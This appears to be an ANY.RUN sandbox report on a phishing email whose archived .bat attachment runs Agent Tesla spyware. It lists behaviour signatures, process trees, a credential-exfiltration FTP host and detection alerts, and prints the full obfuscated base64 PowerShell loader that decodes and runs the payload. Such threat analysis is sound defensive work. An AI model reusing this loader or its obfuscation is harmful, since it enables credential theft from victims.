File name:

AW_ Order n°96868421.eml

Full analysis: https://app.any.run/tasks/33314560-7383-445c-b9a9-f3f3b9be057c
Verdict: Malicious activity
Threats:

Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.

Analysis date: October 03, 2025, 16:39:37
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
attachments
attc-arch
arch-exec
stealer
evasion
ultravnc
rmm-tool
agenttesla
exfiltration
ftp
susp-powershell
Indicators:
MIME: message/rfc822
File info: RFC 822 mail, ASCII text, with CRLF line terminators
MD5:

FEF58D78E1B626D3116D7099D5A78584

SHA1:

7FB63F76A399F69DF23276C43A064C0205300318

SHA256:

8E69BF0C0CC6FAAFB637A2C3BA9F8BB62A262728A44B7DDF1339AC50F886E103

SSDEEP:

12288:HMPf40is5/PAl3HRlRqsyTYVhL50bjP2ZPw+Y+KZ:HWf40is5/PAl3HResmYVhiHPGwg0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Generic archive extractor

      • OUTLOOK.EXE (PID: 2708)
    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 2792)
    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 2792)
    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 2792)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 2792)
    • Create files in the Startup directory

      • powershell.exe (PID: 2792)
    • Actions looks like stealing of personal data

      • powershell.exe (PID: 2792)
    • Connects to the CnC server

      • powershell.exe (PID: 2792)
    • AGENTTESLA has been detected (YARA)

      • powershell.exe (PID: 2792)
    • Stealers network behavior

      • powershell.exe (PID: 2792)
    • AGENTTESLA has been detected (SURICATA)

      • powershell.exe (PID: 2792)
    • Steals credentials from Web Browsers

      • powershell.exe (PID: 2792)
  • SUSPICIOUS

    • Executing commands from a ".bat" file

      • WinRAR.exe (PID: 3136)
      • cmd.exe (PID: 3236)
      • cmd.exe (PID: 1348)
    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 3136)
    • Starts CMD.EXE for commands execution

      • WinRAR.exe (PID: 3136)
      • cmd.exe (PID: 3236)
      • cmd.exe (PID: 1348)
    • Application launched itself

      • cmd.exe (PID: 3236)
      • cmd.exe (PID: 1348)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 3060)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 3060)
    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 3060)
    • Executes script without checking the security policy

      • powershell.exe (PID: 2792)
    • Сharacter substitution obfuscation via .replace()

      • powershell.exe (PID: 2792)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 3060)
    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 3060)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 2792)
    • Using PowerShell to operate with local accounts

      • powershell.exe (PID: 2792)
    • Reads the Internet Settings

      • powershell.exe (PID: 2792)
    • Accesses Microsoft Outlook profiles

      • powershell.exe (PID: 2792)
    • Checks for external IP

      • powershell.exe (PID: 2792)
    • Connects to FTP

      • powershell.exe (PID: 2792)
    • Connects to unusual port

      • powershell.exe (PID: 2792)
    • The process connected to a server suspected of theft

      • powershell.exe (PID: 2792)
  • INFO

    • Create files in a temporary directory

      • powershell.exe (PID: 2792)
    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 2792)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 2792)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 2792)
    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 2792)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 2792)
    • Disables trace logs

      • powershell.exe (PID: 2792)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 2792)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 2792)
    • Creates files or folders in the user directory

      • powershell.exe (PID: 2792)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 2792)
    • Reads the software policy settings

      • powershell.exe (PID: 2792)
    • ULTRAVNC has been detected

      • powershell.exe (PID: 2792)
    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 2792)
    • Found Base64 encoded access to Marshal class via PowerShell (YARA)

      • powershell.exe (PID: 2792)
    • Found Base64 encoded access to environment variables via PowerShell (YARA)

      • powershell.exe (PID: 2792)
    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • powershell.exe (PID: 2792)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2792)
    • Launching a file from the Startup directory

      • powershell.exe (PID: 2792)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.eml | E-Mail message (Var. 5) (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
57
Monitored processes
6
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details

Process information

PID
CMD
Path
Indicators
Parent process
1348C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Rar$DIa3136.24627\Order nø96868421 xls.bat" "C:\Windows\System32\cmd.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2708"C:\PROGRA~1\MICROS~1\Office14\OUTLOOK.EXE" /eml "C:\Users\admin\AppData\Local\Temp\AW_ Order n°96868421.eml"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Version:
14.0.6025.1000
Modules
Images
c:\program files\microsoft office\office14\outlook.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
2792""C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" -nop -w h -c ""iex([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(('CgAkAGIAYQBuAGEAbgBhAD0AIgAkAGUAbgBrbgdxynufc2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFrbgdxynufcwAYQBvAGMALgBiAGEAdAAiADsAaQBmACgAVrbgdxynufcABlAHMAdAAtAFAAYQB0AGgAIAAkAGIAYQBurbgdxynufcAGEAbgBhACkAewAkAHIAYQB3AEwAaQBuAGUrbgdxynufcAcwA9AGcAYwAgACQAYgBhAG4AYQBuAGEAfArbgdxynufcA/AHsAJABfACAALQBsAGkAawBlACAAIgA6ArbgdxynufcDoAOgAqACIAfQA7ACQAcABhAHIAdAAxAD0ArbgdxynufcKAAkAHIAYQB3AEwAaQBuAGUAcwB8AD8AewArbgdxynufckAF8AIAAtAGwAaQBrAGUAIAAiADoAOgA6ADrbgdxynufcEAKgAiAH0AfAAlAHsAJABfAC4AUwB1AGIAcrbgdxynufcwB0AHIAaQBuAGcAKAA0ACkAfQApADsAJABwrbgdxynufcAGEAcgB0ADIAPQAoACQAcgBhAHcATABpAG4rbgdxynufcAZQBzAHwAPwB7ACQAXwAgAC0AbABpAGsAZQrbgdxynufcAgACIAOgA6ADoAMgAqACIAfQB8ACUAewAkArbgdxynufcF8ALgBTAHUAYgBzAHQAcgBpAG4AZwAoADQArbgdxynufcKQB9ACkAOwAkAHAAYQByAHQAMwA9ACgAJABrbgdxynufcyAGEAdwBMAGkAbgBlAHMAfAA/AHsAJABfACrbgdxynufcAALQBsAGkAawBlACAAIgA6ADoAOgAzACoAIrbgdxynufcgB9AHwAJQB7ACQAXwAuAFMAdQBiAHMAdAByrbgdxynufcAGkAbgBnACgANAApAH0AKQA7ACQAawBpAHcrbgdxynufcAaQA9ACQAcABhAHIAdAAxACsAJABwAGEAcgrbgdxynufcB0ADIAKwAkAHAAYQByAHQAMwA7ACQAYQBwArbgdxynufcHAAbABlAD0AKAAkAGsAaQB3AGkALQByAGUArbgdxynufccABsAGEAYwBlACIAWwB+ACMAQABdACIALAArbgdxynufciACIALQByAGUAcABsAGEAYwBlACIAbABqAHrbgdxynufcAAaQB5AHAAegBsAGYAYwBtAG0AagB0AHAAIrbgdxynufcgAsACIAIgApADsAaQBmACgAJABhAHAAcABsrbgdxynufcAGUAKQB7AHQAcgB5AHsAaQBlAHgAKABbAFQrbgdxynufcAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQrbgdxynufcA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0ArbgdxynufcFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUArbgdxynufccgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQArbgdxynufc2ADQAUwB0AHIAaQBuAGcAKAAkAGEAcABwAGrbgdxynufcwAZQApACkAKQB9AGMAYQB0AGMAaAB7AH0AfrbgdxynufcQB9AAoAJABvAHIAYQBuAGcAZQA9ACcASAA0rbgdxynufcAHMASQBBAEEAQQBBAEEAQQBBAEUAQQBKAFYrbgdxynufcAVQBhADAALwBiAE0AQgBUADkASwB4AGIASwrbgdxynufcAxAEcAUgAwAEgAZwBQAEUAcABsAGIANQAwArbgdxynufcEkAWQBDAEgAYQAvAFMAbABDAEcAdABvAE0ArbgdxynufcbABKAGIAaAB0AFQAeAB3ADYAMgArADAAZwBrbgdxynufcuAC8AdgB1AGMAcABDADgASwBHAGwAcwArAFrbgdxynufcIATQBuADEATwBlAGQAZQBuADMAdAB0AEsAerbgdxynufcABzAE0AQQBvADUAYwBaAEEARwBmADEARwA3rbgdxynufcADkAVgB2AGUAcQBjAGQAbQBxAFcAKwBQAHcrbgdxynufcATQBSAHEAWgA4AEkANQBYAHUANwA5AFYASQrbgdxynufcBOAFcAOQBWAFMARAB2AGkAUQBoAHgAUQBQArbgdxynufcFIATwBmAFQARABtAG8AYQBhAEMASQB6ADcArbgdxynufcagBqADcAYQBWAEUAawBtAFMAWAB4AE0AaQBrbgdxynufcuAGQALwBJAFAAQgBZAEIAbABmACsANQBmAFrbgdxynufcQAOQBUAEcAaABMAHMAUQB6AGkAVwBWAEcAZrbgdxynufcgBZAGsAMQBtAHEAeABWAEMAUwBOAE0ANQB3rbgdxynufcAEEAOQBSAEQAcgBlAFoASgBJAEIAcABzAHArbgdxynufcANwA3AEoAeABKAGMAaQBnAG4AZgBvAEgAawrbgdxynufcAxAGoAawBEAGsAdwBWADIAbAA2AEwAdwBVArbgdxynufcDYASgBJAG8AbwBIADcANgBqAHMAVQBBAHQArbgdxynufcUgBEAHIAbgBuAHYALwAxAHAAYwB3ADUAWgBrbgdxynufcDAHMASgBUAC8AQQBKAFMARwAyAEEASgAxAErbgdxynufckAawBUAGEATABnADYATgBEAFgAMAB2AEQAdrbgdxynufcAB5AHUASABuADcANgAxAGQAZQBwAEIAMAB6rbgdxynufcAHUAWgBIAFgAdQBmAHMAKwBsAHkATwByAG0rbgdxynufcAKwBDADgAWAA0AEUAcwBEAHYAegBtADgAZgrbgdxynufcBOAGwATQBYADcARQBzADcAdgBtAHEARgBiArbgdxynufcDIAZABwAHIAKwA4AGMALwBwAFoAagA3AHgArbgdxynufcNwBmAEQANABDAGkASwBOAFcAKwBjAGYAcABrbgdxynufc2AEMASQBRAE8AZgAzAGIAZwByAHUAUQBqAErbgdxynufcMAWQBtAHUAeQBzAEgANgBsAFgAdgBwADcAdrbgdxynufcgBGAHgAYwBHAGkAMQBCAGoAeQBVAHYAbwBTrbgdxynufcACsAWQB1AEMAYwBKAFYAdwBNAGgAawB4AFArbgdxynufcASwBDAFcAcwB5AEUAWQA0ADIATwBsAHgARgrbgdxynufcBlADEAVwAwAC8AcwBVAFgAdwBJAGMANgBmArbgdxynufcHEAcwBFAGYARQB4AFYASwB0AFMAcgAxAG0ArbgdxynufcNgBGADEANABYAFUAbgAxAGQAagBSAFoALwBrbgdxynufcpAFcAZgBCADYAcgBzAEoAaABEAEQAUAAzAErbgdxynufcMAcQBhAGYAcgBvAE4ASABDAEQAVgBhADIATrbgdxynufcgBhACsAeABwAGUAUQBDAEoAawBaAHIANABBrbgdxynufcAGsAZABuAFcARABXAFcAWgBKAGsAbABEAHErbgdxynufcAOQA1AGsAbABPAEoAdABPAHEASABvAGIANwrbgdxynufcBJAGsAawBsAGEAQwBVAEsAUgBLAGYALwBxArbgdxynufcFQAcABJAG0ARgBaAFcAUgBYADEAdAB5AEEArbgdxynufcYgAzADQAcwBaAE0ANAAxAFkAeABKAHkATgBrbgdxynufcaAEEAYQBZAFoAagAxAGgAbAAzAFcAKwBXAErbgdxynufc4AbQB5AHEAMABpADAASABTAHgAWQBiAHcAZrbgdxynufcAA3AG8AaQBFAGwAeQBVAHgAdwA3AFcANAB5rbgdxynufcAEcARQA4ADMAVwAxAHAAKwA3AG0AOABZAEgrbgdxynufcAYwAzAFoAYgBMAHEAYQB5AGkANABNAEcAQgrbgdxynufcBSAFUAMwBGAEEASwBrAG8AQgBsAFoAaQBjArbgdxynufcFgAZwBrAFIAMgBQADgAZwAwADkAQgA4AGUArbgdxynufcWABoAG4ATwArAEMAeQBrAGIAaQBtAEUAVwArbgdxynufcxAHoATAByAEMATQBvADEAeAB1AEwAdQBNADrbgdxynufcAAbgBZAGcAUwAyAHgAYwBlAE0ATABXAGUAcrbgdxynufcQBMAEsATAArAGIATQBWAEMAYQBYAHoAYgB4rbgdxynufcAGwAMAB5AE4AZQA4ADcAeQBpAE0AeAA3AFYrbgdxynufcASABOAEkATAArAHUAaQBnAHUAcQBiAGsAMwrbgdxynufcBVADAAMgBTACsAcQB0AEoAWQBmADAASgBaArbgdxynufcDcAbgBFAFgAUwBOAFIAZwByAEEAYwB6AGIArbgdxynufcWgBkAFkAQgAvAHMAcABvADkAcgB1AHQALwBrbgdxynufcpAEUAUwBzAEUAVAA0AFAAawBoAE0AeQAyACrbgdxynufcsAbwBCAHkAYwB1AGgAbAAzAEkARwBHAE0AYrbgdxynufcgBJAHQAcABFAGsANABSADUAYQBoAFUAZAAxrbgdxynufcAEIAaABDAEIAMABzAGwANwBDAHYAaQBkAFQrbgdxynufcAcQBqAHUAcgBZAHIAdABSAHEAcQBPAEkANArbgdxynufcBPAGEAQgBBAGwAYgBiAFAAZQBEAGgAMwBsArbgdxynufcCsAQgB4AG8ATQByAGoAZQAxAEQANgBrAGoArbgdxynufcKwBCAHkAVABVAHEALwBwADcATgBQAGcAYwBrbgdxynufc4AGQAZgBzAGwASwBQAGUAeABvAEMAKwBxAHrbgdxynufcIAZAB5AGIAcwAyADAATgBRAFcAdgBoAEYAarbgdxynufcQBjAEMAMgBmAGwAOQBpACsAegArAFgAKwA2rbgdxynufcAEoAUQByAEcALwA5ACsAQQA0AGgAaQB1AEQrbgdxynufcATgBQADUAZgA2AHAAZQBDAG0AcwA4AEkASwrbgdxynufcBuAE8AagBvAGsATwBMAFMASwA2AEkANwBPArbgdxynufcHEANgBZAG0AUgBYAFAAbgB3ADAATAB0AFQArbgdxynufcLwBBAEwARABJAG4AdgBGAE8AQgBnAEEAQQArbgdxynufcnADsAJABtAGEAbgBnAG8APQBbAEMAbwBuAHrbgdxynufcYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcrbgdxynufcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByrbgdxynufcAGEAbgBnAGUAKQA7ACQAcABpAG4AZQBhAHArbgdxynufcAcABsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwrbgdxynufcB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0ArbgdxynufcHIAZQBhAG0AKAAsACQAbQBhAG4AZwBvACkArbgdxynufcOwBpAGUAeAAoAE4AZQB3AC0ATwBiAGoAZQBrbgdxynufcjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGrbgdxynufcUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZrbgdxynufcQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzrbgdxynufcAHMAaQBvAG4ALgBHAFoAaQBwAFMAdAByAGUrbgdxynufcAYQBtACgAJABwAGkAbgBlAGEAcABwAGwAZQrbgdxynufcAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzArbgdxynufcGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkArbgdxynufcbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBrbgdxynufctAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGrbgdxynufcQAVABvAEUAbgBkACgAKQAKAA=='.Replace('rbgdxynufc','')))))""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3060C:\Windows\system32\cmd.exe /K "C:\Users\admin\AppData\Local\Temp\Rar$DIa3136.24627\Order nø96868421 xls.bat" C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3136"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\MJK9L0MD\Order n96868421 xls.tar"C:\Program Files\WinRAR\WinRAR.exeOUTLOOK.EXE
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3236cmd /c start "" /min "C:\Users\admin\AppData\Local\Temp\Rar$DIa3136.24627\Order nø96868421 xls.bat" C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
14 209
Read events
13 598
Write events
568
Delete events
43

Modification events

(PID) Process:(2708) OUTLOOK.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
(PID) Process:(2708) OUTLOOK.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
(PID) Process:(2708) OUTLOOK.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10021400000000000F01FEC\Usage
Operation:writeName:StemmerFiles_1042
Value:
(PID) Process:(2708) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Resiliency\StartupItems
Operation:delete valueName:*>*
Value:
㸪*ઔ
(PID) Process:(2708) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Resiliency\StartupItems
Operation:delete valueName:g;*
Value:
㭧*ઔ
(PID) Process:(2708) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Resiliency\StartupItems
Operation:delete keyName:(default)
Value:
(PID) Process:(2708) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2708) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2708) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2708) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
Executable files
0
Suspicious files
6
Text files
10
Unknown types
0

Dropped files

PID
Process
Filename
Type
2708OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVRA3D7.tmp.cvr
MD5:
SHA256:
2708OUTLOOK.EXEC:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst
MD5:
SHA256:
3136WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa3136.24627\Order nø96868421 xls.battext
MD5:F47E7E715AF7F9A3DD4280DD91570A9D
SHA256:440A0806F8E618D11BA338A73E3FBBBB7D5B7E473F37C2E0A075C3B792CDB0C3
2792powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:1C81E82E957A903380181AD6DB60C775
SHA256:D0D3AB60D2888EBA93D12958C806D834D0B6DD9A834892A08ED6DB62EC27554D
2708OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Outlook\mapisvc.inftext
MD5:F3B25701FE362EC84616A93A45CE9998
SHA256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
2708OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\{4B715911-E7DE-4605-A98F-3A0BFC0FAAE3}\{1C306CB1-771E-4B4B-A902-86E897877F5B}.pngimage
MD5:4C61C12EDBC453D7AE184976E95258E1
SHA256:296526F9A716C1AA91BA5D6F69F0EB92FDF79C2CB2CFCF0CEB22B7CCBC27035F
2708OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\StructuredQuery.logtext
MD5:717C04815E38C4A0955C21CC1F0AB3DD
SHA256:7E1CD4B6015D98A0591A2F7BFD19BD4BF545F2E16828D9D6578BE8C4288F7830
3060cmd.exeC:\Users\admin\aoc.battext
MD5:F47E7E715AF7F9A3DD4280DD91570A9D
SHA256:440A0806F8E618D11BA338A73E3FBBBB7D5B7E473F37C2E0A075C3B792CDB0C3
2708OUTLOOK.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotmbinary
MD5:B648E676A8B33F1BDC736B161009ACEF
SHA256:CEFCC8B706C601FFE25C6C06B17A0FE295AF6EEE84454218DE30F0076A4ECE5F
2708OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\tmpA4F1.tmptext
MD5:A03A1A57C95C1363DBA450776EBC6D46
SHA256:9A6AFCF6F47849C595752AC363BBDE10D2816D76791F75147BBB5148E9CEDBDE
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
9
DNS requests
5
Threats
13

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
224.0.0.252:5355
whitelisted
4
System
192.168.100.255:138
whitelisted
1076
svchost.exe
224.0.0.252:5355
whitelisted
2708
OUTLOOK.EXE
64.4.26.155:80
config.messenger.msn.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
2792
powershell.exe
104.26.12.205:443
api.ipify.org
CLOUDFLARENET
US
whitelisted
2792
powershell.exe
192.185.13.234:21
ftp.concaribe.com
UNIFIEDLAYER-AS-1
US
malicious
2792
powershell.exe
192.185.13.234:44601
ftp.concaribe.com
UNIFIEDLAYER-AS-1
US
unknown

DNS requests

Domain
IP
Reputation
google.com
  • 172.217.16.142
whitelisted
config.messenger.msn.com
  • 64.4.26.155
whitelisted
dns.msftncsi.com
  • 131.107.255.255
whitelisted
api.ipify.org
  • 104.26.12.205
  • 172.67.74.152
  • 104.26.13.205
whitelisted
ftp.concaribe.com
  • 192.185.13.234
unknown

Threats

PID
Process
Class
Message
1076
svchost.exe
Misc activity
ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
2792
powershell.exe
Misc activity
ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI
Device Retrieving External IP Address Detected
ET INFO External IP Lookup api.ipify.org
Device Retrieving External IP Address Detected
POLICY [ANY.RUN] External IP Lookup by HTTP (api .ipify .org)
2792
powershell.exe
A Network Trojan was detected
ET MALWARE Agent Tesla CnC Exfil via TCP
2792
powershell.exe
Successful Credential Theft Detected
STEALER [ANY.RUN] Clear Text Login Exfiltration Atempt
2792
powershell.exe
Successful Credential Theft Detected
STEALER [ANY.RUN] Clear Text Password Exfiltration Atempt
2792
powershell.exe
A Network Trojan was detected
STEALER [ANY.RUN] AgentTesla Exfiltration (raw TCP)
2792
powershell.exe
A Network Trojan was detected
STEALER [ANY.RUN] AgentTesla Exfiltration (raw TCP)
2792
powershell.exe
Misc activity
INFO [ANY.RUN] FTP protocol command for uploading a file
No debug info